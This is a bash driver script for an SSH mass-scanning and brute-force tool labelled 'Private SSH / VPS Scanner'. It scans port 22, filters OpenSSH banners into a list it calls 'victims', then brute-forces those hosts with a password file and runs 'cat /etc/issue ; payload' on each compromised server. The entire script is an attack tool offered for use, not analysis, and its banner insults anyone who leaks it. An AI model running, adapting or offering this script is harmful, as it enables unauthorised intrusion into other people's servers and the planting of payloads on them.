rm -rf bios.txt
rm -rf mfu.txt
rm -rf banner.log
timeout="130"
speed="10"
interface="eth0"
port="22"
echo -e "\e[34m####################################################"
echo -e "\e[34m#        \e[32mPrivate SSH / VPS Scanner                 \e[34m#"
echo -e "\e[34m#        \e[32mDeveloped By Nite Max                     \e[34m#"
echo -e "\e[34m#        \e[32mDon't Leak This You Piece of Shit!!       \e[34m#"
echo -e "\e[34m####################################################"

sleep 5



./motd


sleep 1
timeout $timeout ./shitscanner $port -i $interface -s $speed
pkill shitscanner
sleep 2
./boner bios.txt 22 3500
pkill boner
cat banner.log  |grep SSH-2.0-OpenSSH |awk '{print $1}' |uniq |shuf >> mfu.txt

victims=`grep -c . mfu.txt`

echo -e "\e[35m[PRIVATE] \e[97mHRDMV1 - \e[32mBrute Force Starting !!!"
echo -e "\e[35m[PRIVATE] \e[97mHRDMV1 - \e[32mWe Have \e[91m$victims \e[32mvulnerable servers"
sleep 1
clear
./brute 9999 -f mfu.txt pass_file 22 "cat /etc/issue ; payload"
echo -e "\e[35m[PRIVATE] \e[97mHRDMV1 - \e[32mScan Has Been Finished ! All Output has been saved in --> \e[91mgasite.txt"
